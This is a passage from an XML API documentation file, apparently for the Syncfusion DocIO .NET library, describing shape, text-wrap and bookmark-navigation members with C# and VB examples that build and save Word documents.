            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.IsDeleteRevision">
            <summary>
            Gets a value indicating whether this item was deleted from the document,
            when <see cref="P:Syncfusion.DocIO.DLS.WordDocument.TrackChanges"/> is or was set to <b>true</b>. Read-only.
            </summary>
            <value><b>True</b> if this instance is delete revision; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.IsChangedCFormat">
            <summary>
            Gets or set a value indicating whether this instance has changed format.
            </summary>
            <value>
            	if this instance has changed format, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.StartPos">
            <summary>
            Gets or sets the start pos of paragraph item.
            </summary>
            <value>The start pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.EndPos">
            <summary>
            Gets the end pos of paragraph item.
            </summary>
            <value>The end pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.ItemDetached">
            <summary>
            Gets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> is detached.
            </summary>
            <value>if detached, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.ParaItemCharFormat">
            <summary>
            Sets the paragraph item character format.
            </summary>
            <value>The paragraph item char format.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeBase.CloneImpl">
            <summary>
            Creates a duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.Shape"/> 
            or <see cref="T:Syncfusion.DocIO.DLS.WChart"/> object.
            <exclude/>
            </summary>
            <returns>The reference to the newly created object.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.ShapeID">
            <summary>
            Gets or sets ID of the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.HorizontalOrigin">
            <summary>
            Gets or sets the horizontal origin values for shape or chart.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the horizontal origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeWidthHorizontalOrigin">
            <summary>
            Gets or sets the horizontal origin value related to relative width of shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the horizontal origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeHeightVerticalOrigin">
            <summary>
            Gets or sets the vertical origin value related to relative height of shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the vertical origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeHorizontalOrigin">
            <summary>
            Gets or sets the horizontal origin value related to relative horizontal position.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the horizontal origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeVerticalOrigin">
            <summary>
            Gets or sets the vertical origin value related to realtive vertical position.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the vertical origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.HorizontalAlignment">
            <summary>
            Gets or sets the horizontal alignment for shape or chart.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.ShapeHorizontalAlignment"/> member that specifies the horizontal alignment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.HorizontalPosition">
            <summary>
            Gets or sets horizontal position of shape or chart measured in points.
            </summary>
            <value>The <b>float </b> that specifies the horizontal position of the shape or chart.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeHorizontalPosition">
            <summary>
            Gets or sets the relative horizontal position of shape.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeVerticalPosition">
            <summary>
            Gets or Sets the relative vertical position of shape.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeHeight">
            <summary>
            Gets or Sets relative height of shape.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.RelativeWidth">
            <summary>
            Gets or Sets relative width of shape.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.IsRelativeVerticalPosition">
            <summary>
            Gets or Sets a value indicating whether the shape has relative vertical position.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.IsRelativeHorizontalPosition">
            <summary>
            Gets or Sets a value indicating whether the shape has relative horizontal position.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.IsRelativeHeight">
            <summary>
            Gets or Sets a value indicating whether the shape has relative height.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.IsRelativeWidth">
            <summary>
            Gets or Sets a value indicating whether the shape has relative width.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.VerticalOrigin">
            <summary>
            Gets or sets vertical origin of the shape or chart.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.VerticalOrigin"/> member that specifies the vertical origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.VerticalAlignment">
            <summary>
            Gets or sets the vertical alignment of the shape or chart.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.ShapeVerticalAlignment"/> member that specifies the vertical alignment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.VerticalPosition">
            <summary>
            Gets or sets the vertical position of the shape or chart measured in points.
            </summary>
            <value>The <b>float </b> that specifies the vertical position of the shape or chart.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.Height">
            <summary>
            Gets or sets the height of the shape or chart measured in points.
            </summary>
            <value>The <b>float </b> that specifies the height of the shape or chart.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.Width">
            <summary>
            Gets or sets the width of the shape or chart measured in points.
            </summary>
            <value>The <b>float </b> that specifies the width of the shape or chart.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.HeightScale">
            <summary>
            Gets or sets the height scale factor of shape or chart measured in percent.
            </summary>
            <value>The <b>float </b> that specifies the height scale factor.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.WidthScale">
            <summary>
            Gets or sets the width scale factor of shape or chart measured in percent.
            </summary>
            <value>The <b>float </b> that specifies the width scale factor.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.AlternativeText">
            <summary>
            Gets or sets the alternate text for the shape or chart.
            </summary>
            <value>The <b>string</b> that represents the alternate text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.Name">
            <summary>
            Gets or sets the name of the shape or chart.
            </summary>
            <value>The <b>string </b> that represents the name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.Title">
            <summary>
            Gets or sets the title for the shape or chart.
            </summary>
            <value>The <b>string </b> that represents the title.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.WrapFormat">
            <summary>
            Gets or sets the text wrap format of the shape or chart.
            </summary>
            <value>The <see cref="!:Sysncfusion.DocIO.DLS.WrapFormat"/> for the shape or chart.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.ZOrderPosition">
            <summary>
            Gets or sets the relative height of the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.IsBelowText">
            <summary>
            Gets or sets a value indicating whether the shape or chart should be preserved 
            behind the text that surrounds the shape or chart.
            </summary>
            <value><b>True</b> if the shape or chart will be preserved behind the text; 
            <b>false</b> if the shape or chart will be preserved in front of the text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.LayoutInCell">
            <summary>
            Gets or sets the value indicating whether the anchor is in cell
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.LockAnchor">
            <summary>
            Gets or sets the value indicating whether the anchor position can be modified.
            </summary>
            <value><b>True</b> if the position of anchor should not be modified; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.IsCloned">
            <summary>
            Gets or sets a value indicating whether this instance is cloned.
            </summary>
            <value>
              <c>true</c> if this instance is cloned; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.Visible">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.Shape"/> 
            or <see cref="T:Syncfusion.DocIO.DLS.WChart"/> is visible.
            </summary>
            <value>
              <b>True</b> if visible; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeBase.DocxProps">
            <summary>
            Gets the stream the shape/chart elements
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.ILeafWidget">
            <summary>
            Represent a widget that can MEASURE self.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.ILeafWidget.Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures self size. 
            </summary>
            <param name="graphics"></param>
            <returns></returns>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Shape.ShapeTypeID">
            <summary>
            Variable that specifies the shape type ID.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.#ctor(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.AutoShapeType)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.Shape"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance and the shape type.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
            <param name="autoShapeType">The type of the shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.AttachToDocument">
            <summary>
            Executes when the entity is attached to the owner document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.CloneImpl">
            <summary>
            Creates a duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.Shape"/> object.
            <exclude/>
            </summary>
            <returns>The reference of the newly created <see cref="T:Syncfusion.DocIO.DLS.Shape"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.CloneShapeFormat(Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Creates a duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.Shape"/> object.
            </summary>
            <returns>The reference of the newly created <see cref="T:Syncfusion.DocIO.DLS.Shape"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.StyleColorTransform(System.Collections.Generic.List{System.Collections.DictionaryEntry},System.Drawing.Color,System.UInt32@)">
            <summary>
            To get the color from theme item
            </summary>
            <param name="fillTransformation"></param>
            <param name="themeColor"></param>
            <param name="opacity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.GetPercentage(System.String)">
            <summary>
            To get the percentage value from the given string
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.ApplyCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Applies the specified character format to the shape.
            </summary>
            <param name="charFormat">The character format to be applied.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.SetShapeWidth(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Sets the width depends on relative width of shape.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.SetShapeHeight(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Sets the height depends on relative height of shape.
            </summary>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Shape.CreateLayoutInfo">
            <summary>
            Creates the layout information.
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.Is2007Shape">
            <summary>
            Gets or sets a value indicating whether [is2007 shape].
            </summary>
            <value>
              <c>true</c> if [is2007 shape]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.TextLayoutingBounds">
            <summary>
            Get/Set  Text content layouting bounds for shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.TextFrame">
            <summary>
            Gets or sets the <see cref="T:Syncfusion.DocIO.DLS.TextFrame"/> for the shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextFrame"/> instance that specifies the formatting options for text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.DocxStyleProps">
            <summary>
            Gets the docx style properties.
            </summary>
            <value>The docx style props.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.ImageRelations">
            <summary>
            Gets the image relations.
            </summary>
            <value>The image relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.ShapeGuide">
            <summary>
            Gets the shape guide
            </summary>
            <value>The shape guide.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.AutoShapeType">
            <summary>
            Gets the shape type of the current shape object. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.AutoShapeType"/> member that specifies the type of the shape.</value>
            <remarks>The shape type must represent an AutoShape other than a line or free form drawing.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.TextBody">
            <summary>
            Gets or sets the text body for the shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> that specifies the shape body contents.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.LineFormat">
            <summary>
            Gets or sets the line formatting options for outline of the shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.LineFormat"/> instance.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.FillFormat">
            <summary>
            Gets or sets the fill effects for the shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.FillFormat"/> instance.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.EffectList">
            <summary>
            Gets/ sets  Effect format of the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.FlipHorizantal">
            <summary>
            Gets or sets a value indicating whether [flip horizantal].
            </summary>
            <value>
              <c>true</c> if [flip horizantal]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.FlipVertical">
            <summary>
            Gets or sets a value indicating whether [flip vertical].
            </summary>
            <value>
              <c>true</c> if [flip vertical]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.IsEffectStyleInline">
            <summary>
            Flag to ensure Effect Style applied for shape inline
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.IsLineStyleInline">
            <summary>
            Flag to ensure Line Style applied for shape inline
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.IsFillStyleInline">
            <summary>
            Flag to ensure Fill Style applied for shape inline
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.IsScenePropertiesInline">
            <summary>
            Flag to ensure Fill Style applied for shape inline
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.IsShapePropertiesInline">
            <summary>
            Flag to ensure Fill Style applied for shape inline
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Shape.Relations">
            <summary>
            Gets the relations.
            </summary>
            <value>The relations.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShapeStyleReference">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextFrame">
            <summary>
            Represents the text frame in the Shape.
            </summary>
            <remarks></remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextFrame.TextDirection">
            <summary>
            Gets or sets the direction of the text in the Shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextDirection"/> member that specifies the direction of text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextFrame.TextVerticalAlignment">
            <summary>
            Gets or sets the vertical alignment of the text.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.VerticalAlignment"/> member that specifies the text vertical alignment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextFrame.InternalMargin">
            <summary>
            Gets the internal margin.
            </summary>
            <value>The internal margin.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WrapFormat">
            <summary>
            Represents the functions that specify how text wraps around the object in the Word document.  
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet");
                //Add new shape to the document
                Shape rectangle = paragraph.AppendShape(AutoShapeType.RoundedRectangle, 150, 100);
                //Set position for shape
                rectangle.VerticalPosition = 72;
                rectangle.HorizontalPosition = 72;
                //Set text wrapping style
                rectangle.WrapFormat.TextWrappingStyle = TextWrappingStyle.TopAndBottom;
                rectangle.WrapFormat.DistanceBottom = 10;
                rectangle.WrapFormat.DistanceLeft = 10;
                rectangle.WrapFormat.DistanceRight = 10;
                rectangle.WrapFormat.DistanceTop = 20;
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet")
                'Add new shape to the document
                Dim rectangle As Shape = paragraph.AppendShape(AutoShapeType.RoundedRectangle, 150, 100)
                'Set position for shape
                rectangle.VerticalPosition = 72
                rectangle.HorizontalPosition = 72
                'Set text wrapping style
                rectangle.WrapFormat.TextWrappingStyle = TextWrappingStyle.TopAndBottom
                rectangle.WrapFormat.DistanceBottom = 10
                rectangle.WrapFormat.DistanceLeft = 10
                rectangle.WrapFormat.DistanceRight = 10
                rectangle.WrapFormat.DistanceTop = 20
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WrapFormat.SetTextWrappingStyle(Syncfusion.DocIO.DLS.TextWrappingStyle)">
             <summary>
            Sets the TextWrappingStyle,specific for parsers.
             </summary>
             <param name="TextWrapStyle">TextWrapStyle</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WrapFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.AllowOverlap">
            <summary>
            Gets or sets a value indicating whether a given shape can overlap other shapes. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.DistanceBottom">
            <summary>
            Gets or sets the distance (in points) between the document text and the bottom edge of the text-free area surrounding the specified shape.
            </summary>
            <value>The <b>float</b> that specifies the distance between text and bottom edge of the shape.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.DistanceLeft">
            <summary>
            Gets or sets the distance (in points) between the document text and the left edge of the text-free area surrounding the specified shape.
            </summary>
            <value>The <b>float</b> that specifies the distance between text and left edge of the shape.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.DistanceRight">
            <summary>
            Gets or sets the distance (in points) between the document text and the right edge of the text-free area surrounding the specified shape.
            </summary>
            <value>The <b>float</b> that specifies the distance between text and right edge of the shape.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.DistanceTop">
            <summary>
            Gets or sets the distance (in points) between the document text and the top edge of the text-free area surrounding the specified shape.
            </summary>
            <value>The <b>float</b> that specifies the distance between text and top edge of the shape.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.IsBelowText">
            <summary>
            Gets or sets a value indicating whether the shape or chart should be preserved 
            behind the text that surrounds the shape or chart.
            </summary>
            <value><b>True</b> if the shape or chart will be preserved behind the text; 
            <b>false</b> if the shape or chart will be preserved in front of the text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.TextWrappingType">
            <summary>
            Gets or sets the text wrapping type for the specified shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingType"/> member that specifies the wrapping type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.TextWrappingStyle">
            <summary>
            Gets or sets the text wrapping style for the specified shape.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingStyle"/> member that specifies the text wrapping style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WrapFormat.WrapPolygon">
            <summary>
            Gets or sets the wrap polygon.
            </summary>
            <value>
            The wrap polygon.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BookmarksNavigator">
            <summary>
            Helps to navigate between bookmarks in the Word document and manipulate its contents.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BookmarksNavigator.m_document">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:BookmarksNavigator"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.MoveToBookmark(System.String)">
            <summary>
            Moves to the specified bookmark in the document.
            </summary>
            <exception cref="T:System.ArgumentException">The specified bookmark name is not present in the Word document.</exception>
            <param name="bookmarkName">The <b>string</b> that specifies the bookmark name.</param>
            <example>
            <para>The following code example demonstrates how to move to specific bookmark in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Get the bookmark content
                TextBodyPart part = bookmarkNavigator.GetBookmarkContent();
                //Add the retrieved content into another new section
                    document.AddSection();
                foreach(TextBodyItem item in part.BodyItems)
                    document.LastSection.Body.ChildEntities.Add(item);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Get the bookmark content
                Dim part As TextBodyPart = bookmarkNavigator.GetBookmarkContent()
                'Add the retrieved content into another new section
                document.AddSection()
                For Each item As TextBodyItem In part.BodyItems
                    document.LastSection.Body.ChildEntities.Add(item)
                Next
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.MoveToBookmark(System.String,System.Boolean,System.Boolean)">
            <summary>
            Moves to the start or end position of the specified bookmark in the document.
            </summary>
            <param name="bookmarkName">The <b>string</b> that specifies the bookmark name.</param>
            <param name="isStart">Set to <b>true</b> to move the navigator at the beginning of the bookmark; Set to <b>false</b> to move the navigator at the end of the bookmark.</param>
            <param name="isAfter">Set to <b>true</b> to move the navigator after the specified bookmark start or end position; Set to <b>false</b> to move the navigator before the specified bookmark start or end position. </param>
            <exception cref="T:System.ArgumentException">The specified bookmark name is not present in the Word document.</exception>
            <param name="bookmarkName">The <b>string</b> that specifies the bookmark name.</param>
            <example>
            <para>The following code example demonstrates how to move to specific bookmark in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", true, false);
                //Get the bookmark content
                TextBodyPart part = bookmarkNavigator.GetBookmarkContent();
                //Add the retrieved content into another new section
                    document.AddSection();
                foreach(TextBodyItem item in part.BodyItems)
                    document.LastSection.Body.ChildEntities.Add(item);
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind", True, False)
                'Get the bookmark content
                Dim part As TextBodyPart = bookmarkNavigator.GetBookmarkContent()
                'Add the retrieved content into another new section
                document.AddSection()
                For Each item As TextBodyItem In part.BodyItems
                    document.LastSection.Body.ChildEntities.Add(item)
                Next
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertText(System.String)">
            <summary>
            Inserts the specified text to current bookmark.
            </summary>
            <param name="text">The <b>string</b> that represents the text to be inserted.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/> object that represents the inserted text.</returns>
            <example>This example shows how to insert a simple text using BookmarkNavigator.
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Create the bookmark navigator instance to access the bookmark
                BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
                //Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind");
                //Insert a new text before the bookmark end of the bookmark
                bookmarkNavigator.InsertText(" Northwind Database is a set of tables containing data fitted into predefined categories.");
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Create the bookmark navigator instance to access the bookmark
                Dim bookmarkNavigator As New BookmarksNavigator(document)
                'Move the virtual cursor to the before the end location of the bookmark "Northwind"
                bookmarkNavigator.MoveToBookmark("Northwind")
                'Insert a new text before the bookmark end of the bookmark
                bookmarkNavigator.InsertText(" Northwind Database is a set of tables containing data fitted into predefined categories.")
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertText(System.String,System.Boolean)">
            <summary>
            Inserts the specified text to current bookmark along with its formatting.
            </summary>
